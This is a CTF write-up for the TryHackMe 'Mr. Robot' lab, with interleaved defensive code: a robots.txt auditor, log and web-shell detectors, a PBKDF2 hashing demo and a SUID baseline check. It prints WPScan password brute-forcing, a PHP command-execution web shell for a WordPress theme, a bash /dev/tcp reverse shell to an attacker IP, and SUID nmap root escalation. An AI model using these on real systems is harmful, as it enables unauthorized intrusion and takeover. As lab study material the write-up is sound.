TryHackMe — Mr. Robot — Detailed Walkthrough

Room: Mr. Robot
Author: Karan Tank
Type: Beginner → Intermediate (Web → PrivEsc)

Summary

Mr. Robot is a classic TryHackMe machine that mimics the storyline of the TV series. It combines web enumeration (WordPress), credential discovery, and privilege escalation via common misconfigurations. The objective is to capture three flags: key-1-of-3, key-2-of-3 and key-3-of-3.

Note: This writeup intentionally includes realistic commands and output examples. Use these techniques only on authorized targets (CTFs, labs you own, or explicit permission).

1 — Recon & Scanning

Initial port scan

Start with a full TCP scan to discover services:

nmap -sC -sV -p- --min-rate=1000 -oN nmap_full.txt <TARGET_IP>

Typical results (example):

PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 7.6p1
80/tcp  open  http    Apache httpd 2.4.29
443/tcp open  https   Apache httpd 2.4.29 (SSL)

In Mr. Robot, the important service is the web server (HTTP).

Quick web check

Open the site in a browser. The landing page is a WordPress-based blog styled after the show, which makes it a prime candidate for web enumeration and configuration leaks.

2 — Web Enumeration

Directory brute-force

Use a directory bruteforcer like gobuster or dirb to find hidden files and paths:

gobuster dir -u http://<TARGET_IP> -w /usr/share/wordlists/dirb/common.txt -x php,txt,html,log -o gobuster.txt

Check /robots.txt and other public files:

curl -s http://<TARGET_IP>/robots.txt | sed -n '1,120p'

Example found entries (this is critical):

User-agent: *
Disallow: /fsocity.dic
Disallow: /key-1-of-3.txt

Finding fsocity.dic is a big clue — it's a large wordlist commonly used in this box for password brute-forcing.
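The lesson behind this step is that robots.txt is advisory only: every Disallow line is an advertisement, not a protection. The following is an added example (not part of this writeup) of a small robots.txt parser and audit a site owner could run over their own file before publishing it; the sample robots.txt is constructed to match the entries above, the base URL target.example is a placeholder, and the SENSITIVE_PATTERNS list is this example's own assumption about which names deserve a second look.

```python
import re
from urllib.parse import urljoin

# Constructed sample: the robots.txt entries the walkthrough finds on the box.
SAMPLE_ROBOTS = """\
# Example robots.txt (constructed to match the walkthrough)
User-agent: *
Disallow: /fsocity.dic
Disallow: /key-1-of-3.txt
Allow: /wp-content/uploads/
"""

# Filename patterns that usually mean the entry hides data rather than crawl noise.
# This list is an assumption of the example, not a standard.
SENSITIVE_PATTERNS = [
    (re.compile(r"\.(dic|lst|txt|bak|old|orig|sql|zip|tar|gz|log|env)$", re.I), "data or backup file"),
    (re.compile(r"(key|secret|passw|cred|flag|token)", re.I), "name suggests a credential or flag"),
    (re.compile(r"^/(wp-admin|admin|phpmyadmin|\.git|\.svn)", re.I), "administrative or VCS path"),
]


def parse_robots(text):
    """Return (directive, value) pairs from robots.txt, ignoring comments and blank lines.

    Directive names are case-insensitive by convention; values keep their case because
    paths on the web server may be case-sensitive.
    """
    entries = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or ":" not in line:
            continue
        directive, value = line.split(":", 1)
        entries.append((directive.strip().lower(), value.strip()))
    return entries


def disallowed_paths(text):
    """All non-empty Disallow values, in file order, without duplicates."""
    seen = []
    for directive, value in parse_robots(text):
        if directive == "disallow" and value and value not in seen:
            seen.append(value)
    return seen


def audit_robots(text, base_url="http://target.example/"):
    """For each Disallow entry, give the full URL it advertises and why a reviewer should look.

    Returns a list of dicts; an empty "reasons" list means nothing in the name stood out,
    but the path is still public.
    """
    findings = []
    for path in disallowed_paths(text):
        reasons = [why for pattern, why in SENSITIVE_PATTERNS if pattern.search(path)]
        findings.append({"path": path, "url": urljoin(base_url, path), "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in audit_robots(SAMPLE_ROBOTS):
        flag = "REVIEW" if f["reasons"] else "ok"
        print(f"{flag:6} {f['url']}  {'; '.join(f['reasons'])}")
```

Run against the sample, both entries come back flagged: the .dic file as a data file and key-1-of-3.txt for its name as well. The fix on the hosting side is not a different robots.txt but removing the files from the web root, or putting them behind authentication.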

Retrieve the file & the first flag

curl -s http://<TARGET_IP>/fsocity.dic -o fsocity.dic
curl -s http://<TARGET_IP>/key-1-of-3.txt -o key-1-of-3.txt
cat key-1-of-3.txt

After this step you should have key-1-of-3.txt.

WordPress login

WordPress endpoints may be present:

http://<TARGET_IP>/wp-login.php

Use the discovered dictionary to brute-force a WordPress login for common users.

WPScan (optional)

WPScan can enumerate themes, plugins and attempt wordlist logins:

wpscan --url http://<TARGET_IP> --enumerate u,vp,tt --threads 10

To brute-force a username (e.g., Elliot) with the discovered dictionary:

wpscan --url http://<TARGET_IP> -U Elliot -P fsocity.dic --disable-tls-checks

Sometimes it is faster to try common usernames first (e.g., admin, elliot, robot); the box follows the show, so Elliot is the usual one.

3 — Getting a Shell

Successful WP login

Once credentials are found, log in to the WordPress admin dashboard. From there, Appearance → Theme Editor (or a plugin editor) allows direct file edits if the editor has not been disabled.

Upload or inject a web shell

Two common approaches:

  1. Edit a theme PHP file (e.g., 404.php) and place a small PHP command execution snippet:

<?php if(isset($_REQUEST['cmd'])){echo "<pre>"; system($_REQUEST['cmd']); echo "</pre>"; exit; } ?>

     Trigger it:

curl "http://<TARGET_IP>/404.php?cmd=id"

  2. If the host allows reverse connections, use a reverse shell payload. Example using netcat (on your machine):

# On attackbox
nc -lvnp 9001

# Trigger from victim (via web shell)
/bin/bash -i >& /dev/tcp/<your_ip>/9001 0>&1

If direct reverse shells are blocked, use `curl`/`wget` to fetch a more capable payload or use socks/proxy pivoting.
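Both the WPScan brute force in section 2 and the theme-editor web shell above leave clear traces in the Apache access log and in the edited theme file. The following is an added example (not from this writeup) of the detection side: one log parser feeding two checks, a login brute-force counter for wp-login.php and a web-shell request matcher, plus a source scan for execution functions fed straight from request input. The log lines are constructed to mirror the commands above (the 404.php?cmd=id trigger and the reverse-shell line), the COMMAND_KEYS and SHELL_VALUE_RE lists are this example's own assumptions, and the PHP sample is the one-liner shown above.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qsl

# Apache "combined" log format; only the fields the checks need are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Query-string keys commonly used by one-line PHP shells (assumed list for this example).
COMMAND_KEYS = {"cmd", "c", "exec", "command", "run"}
# Substrings in a parameter value that indicate shell activity rather than normal site traffic.
SHELL_VALUE_RE = re.compile(r"(/dev/tcp/|/bin/(ba)?sh|\bnc\b|\bwget\b|\bcurl\b|\bpython3?\b)")
# Theme/plugin PHP files (and the walkthrough's /404.php) never take a command parameter legitimately.
THEME_PHP_RE = re.compile(r"^/(wp-content/(themes|plugins)/.*\.php|404\.php)$")
# PHP source pattern: a process-execution function fed directly from request input.
DANGEROUS_PHP_RE = re.compile(
    r"\b(system|exec|shell_exec|passthru|popen|proc_open|eval)\s*\(\s*"
    r"(base64_decode\s*\(\s*)?\$_(GET|POST|REQUEST|COOKIE)\b"
)


def login_bruteforce_sources(log_lines, threshold=20):
    """Client IPs with at least `threshold` POSTs to wp-login.php or xmlrpc.php.

    A failed WordPress login returns 200 with the form re-rendered, so a burst of 200s
    on POST /wp-login.php from one address is the brute-force signature, not a 401.
    """
    counts = Counter()
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # malformed line; a real job would count these separately
        path = urlsplit(m.group("target")).path
        if m.group("method") == "POST" and path in ("/wp-login.php", "/xmlrpc.php"):
            counts[m.group("ip")] += 1
    return {ip: n for ip, n in counts.items() if n >= threshold}


def suspicious_requests(log_lines):
    """(ip, target, reason) for each log line that looks like web-shell use."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        target = m.group("target")
        parts = urlsplit(target)
        params = dict(parse_qsl(parts.query, keep_blank_values=True))
        reasons = []
        if THEME_PHP_RE.match(parts.path) and COMMAND_KEYS & set(params):
            reasons.append("command parameter on a theme/plugin PHP file")
        if any(SHELL_VALUE_RE.search(v) for v in params.values()):
            reasons.append("shell syntax in parameter value")
        if reasons:
            hits.append((m.group("ip"), target, "; ".join(reasons)))
    return hits


def dangerous_php_calls(source):
    """Execution functions in PHP source that take request input directly, sorted."""
    return sorted({m.group(1) for m in DANGEROUS_PHP_RE.finditer(source)})


# Constructed sample log: one normal page view, the walkthrough's shell trigger
# (curl ".../404.php?cmd=id"), a reverse-shell attempt through the same parameter,
# and 25 login POSTs from the same client (what a WPScan password run looks like).
SAMPLE_LOG = [
    '10.0.0.5 - - [12/Mar/2024:10:15:01 +0000] "GET /wp-content/themes/twentyfifteen/style.css HTTP/1.1" 200 812 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [12/Mar/2024:10:15:32 +0000] "GET /404.php?cmd=id HTTP/1.1" 200 512 "-" "curl/7.81.0"',
    '10.0.0.9 - - [12/Mar/2024:10:16:07 +0000] "GET /wp-content/themes/twentyfifteen/404.php?cmd=/bin/bash+-i+%3E%26+/dev/tcp/10.0.0.9/9001+0%3E%261 HTTP/1.1" 200 0 "-" "curl/7.81.0"',
] + [
    f'10.0.0.9 - - [12/Mar/2024:10:14:{i:02d} +0000] "POST /wp-login.php HTTP/1.1" 200 3801 "-" "WPScan v3.8"'
    for i in range(25)
]

# The one-line shell from the walkthrough, as it would sit in an edited theme file.
SAMPLE_PHP = "<?php if(isset($_REQUEST['cmd'])){echo \"<pre>\"; system($_REQUEST['cmd']); echo \"</pre>\"; exit; } ?>"

if __name__ == "__main__":
    print("login brute-force sources:", login_bruteforce_sources(SAMPLE_LOG))
    for ip, target, reason in suspicious_requests(SAMPLE_LOG):
        print(f"{ip} {target}\n    {reason}")
    print("dangerous calls in theme file:", dangerous_php_calls(SAMPLE_PHP))
```

The two log checks are cheap enough to run from cron over the previous hour of access_log; the source scan is the kind of thing to run over wp-content after any admin login from an unexpected address, and it catches the snippet above on the `system($_REQUEST[...])` pattern. Disabling the file editor (`DISALLOW_FILE_EDIT` in wp-config.php) removes the write path entirely.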

Upgrade the shell

Always upgrade to a proper interactive shell:

python3 -c 'import pty; pty.spawn("/bin/bash")'
Ctrl-Z
stty raw -echo; fg
reset
export SHELL=bash; export TERM=xterm-256color

4 — Privilege Escalation

Initial checks

uname -a
id
ls -la /home

Look for interesting files in user directories:

ls -la /home/robot
cat /home/robot/.bash_history

Common Mr. Robot clues

On this box you often find a file like password.raw-md5 or other password hints. Example:

cat /home/robot/password.raw-md5
5f4dcc3b5aa765d61d8327deb882cf99

Use offline cracking, or an online lookup service such as CrackStation where the engagement allows it, to recover the plaintext behind the MD5 hash. Locally you can use hashcat or john (tell john the hash type so it does not have to guess):

john --format=raw-md5 --wordlist=/usr/share/wordlists/rockyou.txt hashfile.txt
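What makes this step work is that the file holds a raw, unsalted MD5: one hash computation per candidate, and the same hash for everyone who picked that password. The following is an added example (not part of this writeup) that runs that dictionary check against the hash shown above with a constructed five-word list, and beside it shows the storage format a developer should have used instead, a salted and iterated PBKDF2-HMAC-SHA256. The hash above is the MD5 of the string "password" (a property of MD5, not of the box); the iteration count is an assumed work factor for this example.

```python
import hashlib
import hmac
import os

# The hash shown in the walkthrough's password.raw-md5 example.
SAMPLE_RAW_MD5 = "5f4dcc3b5aa765d61d8327deb882cf99"

# Constructed mini wordlist standing in for rockyou.txt.
SAMPLE_WORDLIST = ["123456", "letmein", "password", "qwerty", "mrrobot"]

PBKDF2_ITERATIONS = 600_000  # assumed work factor for this example; tune per deployment


def md5_dictionary_check(hex_hash, words):
    """Return the word whose unsalted MD5 equals hex_hash, or None.

    This is the entire weakness of raw MD5: no salt, one fast hash per candidate, so a
    single pass over a wordlist (or a precomputed lookup table) settles it.
    """
    target = hex_hash.strip().lower()
    for word in words:
        if hashlib.md5(word.encode()).hexdigest() == target:
            return word
    return None


def pbkdf2_hash(password, salt=None, iterations=PBKDF2_ITERATIONS):
    """Store a password as 'pbkdf2_sha256$<iterations>$<salt hex>$<digest hex>'.

    A 16-byte random salt defeats shared lookup tables (two users with the same password
    get different hashes); the iteration count makes each guess cost `iterations`
    SHA-256 computations instead of one MD5.
    """
    salt = os.urandom(16) if salt is None else salt
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${digest.hex()}"


def pbkdf2_verify(password, stored):
    """Recompute with the stored salt and iteration count; compare in constant time."""
    algo, iterations, salt_hex, digest_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        raise ValueError("unsupported hash format")
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(digest.hex(), digest_hex)


if __name__ == "__main__":
    found = md5_dictionary_check(SAMPLE_RAW_MD5, SAMPLE_WORDLIST)
    print("raw MD5 recovered from a 5-word list:", found)
    stored = pbkdf2_hash(found)
    print("same password stored properly:", stored)
    print("verify correct:", pbkdf2_verify(found, stored), "| verify wrong:", pbkdf2_verify("letmein", stored))
```

The same dictionary check against the PBKDF2 form still exists in principle, but it has to be re-run per user (because of the salt) and costs hundreds of thousands of hash operations per guess, which is the difference between seconds and years for the same wordlist.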

Switch user to robot

Once you recover the password, switch user:

su - robot
# or
ssh robot@localhost

Grab the second flag (usually in /home/robot):

cat /home/robot/key-2-of-3.txt

Finding SUID/interesting binaries

Search for SUID files and system binaries that can be abused:

find / -perm -4000 -type f 2>/dev/null | sort

Look also for local binaries of common tools that may allow escape (older `nmap`, `vi`, `less`, `awk`, `perl`, etc.).
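The SUID find above is exactly the check the box's owner should have been running on a schedule, with the results diffed against a known-good list. The following is an added example (not part of this writeup) of that baseline audit: it normalizes find(1) output, reports SUID files that are not in the baseline, and ranks them by whether the program is one of the shell-capable tools named above or lives somewhere a package manager would never put a SUID binary. The sample find output and the BASELINE set are constructed for the example; in practice the baseline is recorded from a freshly built image.

```python
import os
import subprocess

# Constructed output of `find / -perm -4000 -type f` from a box like this one; the
# duplicate nmap line stands in for the noise find produces across bind mounts.
SAMPLE_FIND_OUTPUT = """\
/bin/mount
/bin/ping
/bin/su
/bin/umount
/usr/bin/passwd
/usr/bin/sudo
/usr/bin/newgrp
/usr/local/bin/nmap
/usr/local/bin/nmap
/usr/bin/vim.basic
"""

# SUID files this host is expected to have (assumed for the example).
BASELINE = {
    "/bin/mount", "/bin/ping", "/bin/su", "/bin/umount",
    "/usr/bin/passwd", "/usr/bin/sudo",
}

# Program names the walkthrough lists as able to hand out a shell when SUID (see GTFOBins).
SHELL_CAPABLE = {"nmap", "vi", "vim", "vim.basic", "less", "awk", "perl", "python", "python3", "find"}

# Locations package managers do not install SUID binaries into; anything SUID here is hand-placed.
NON_PACKAGE_PREFIXES = ("/usr/local/", "/opt/", "/tmp/", "/home/", "/var/tmp/", "/dev/shm/")


def parse_suid_list(text):
    """Normalize find(1) output: drop blanks, collapse duplicates, return a sorted list."""
    return sorted({line.strip() for line in text.splitlines() if line.strip()})


def audit_suid(found, baseline=BASELINE):
    """Compare the observed SUID set with the baseline.

    Returns (unexpected, missing): unexpected is a sorted list of (path, severity) for SUID
    files outside the baseline, severity 'high' when the name is shell-capable or the path is
    outside package-managed locations, 'medium' otherwise; missing lists baseline entries
    that have disappeared (also worth knowing, since it can mean a replaced binary).
    """
    found_set = set(found)
    unexpected = []
    for path in sorted(found_set - set(baseline)):
        name = os.path.basename(path)
        if name in SHELL_CAPABLE or path.startswith(NON_PACKAGE_PREFIXES):
            severity = "high"
        else:
            severity = "medium"
        unexpected.append((path, severity))
    missing = sorted(set(baseline) - found_set)
    return unexpected, missing


def live_suid_list():
    """Run the same find command the walkthrough uses and return the normalized list."""
    proc = subprocess.run(
        ["find", "/", "-perm", "-4000", "-type", "f"],
        capture_output=True, text=True, check=False,  # permission errors on stderr are expected
    )
    return parse_suid_list(proc.stdout)


if __name__ == "__main__":
    unexpected, missing = audit_suid(parse_suid_list(SAMPLE_FIND_OUTPUT))
    for path, severity in unexpected:
        print(f"[{severity.upper():6}] unexpected SUID: {path}")
    for path in missing:
        print(f"[INFO  ] expected SUID not present: {path}")
```

On the sample, /usr/local/bin/nmap is flagged high on both counts (shell-capable name, hand-installed location) and vim.basic on its name; newgrp comes out medium only because it is missing from the assumed baseline. Swap `parse_suid_list(SAMPLE_FIND_OUTPUT)` for `live_suid_list()` to run it against the real host, and alert on any non-empty `unexpected` list.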

Escalating to root

One canonical Mr. Robot path is abusing an interactive mode in an older nmap binary. Example (if /usr/local/bin/nmap is SUID):

nmap --interactive
# then at the nmap prompt:
!sh
# now you're a shell as root
id
cat /root/key-3-of-3.txt

If nmap --interactive doesn't work, check the binary version and GTFOBins or search for other SUID programs. Privilege escalation is often specific to the environment—enumeration is the key.

5 — Flags (Collected)

Flag             Location                           User
key-1-of-3.txt   /key-1-of-3.txt (from robots.txt)  N/A
key-2-of-3.txt   /home/robot/key-2-of-3.txt         robot
key-3-of-3.txt   /root/key-3-of-3.txt               root

Example commands to view flags (from the appropriate user):

cat /key-1-of-3.txt
cat /home/robot/key-2-of-3.txt
cat /root/key-3-of-3.txt

6 — Lessons & Takeaways

  • Thorough enumeration (directories, robots.txt, files) often yields the quickest wins.
  • Passwords may be present in unusual formats (large dictionaries, raw MD5 hashes). Save and reuse discovered artifacts.
  • Web admin interfaces (WordPress editors, uploaders) are powerful entry points when misconfigured.
  • Privilege escalation commonly leverages SUID misconfigurations and outdated binaries; always check GTFOBins.
  • Document your steps — screenshots, commands, and justification are crucial for reports and learning.

Resources & Tools used

  • nmap, gobuster/dirb, curl/wget
  • wpscan (WordPress enumeration)
  • john/hashcat for password cracking
  • GTFOBins for SUID/binary abuse ideas

Appendix — Useful commands (cheat sheet)


# Scan
nmap -sC -sV -p- <IP>

# Dir brute
gobuster dir -u http://<IP> -w /usr/share/wordlists/dirb/common.txt

# Retrieve files
curl -s http://<IP>/fsocity.dic -o fsocity.dic

# WPScan
wpscan --url http://<IP> --enumerate u --threads 20

# Reverse shell (listener)
nc -lvnp 9001

# Upgrade shell
python3 -c 'import pty; pty.spawn("/bin/bash")'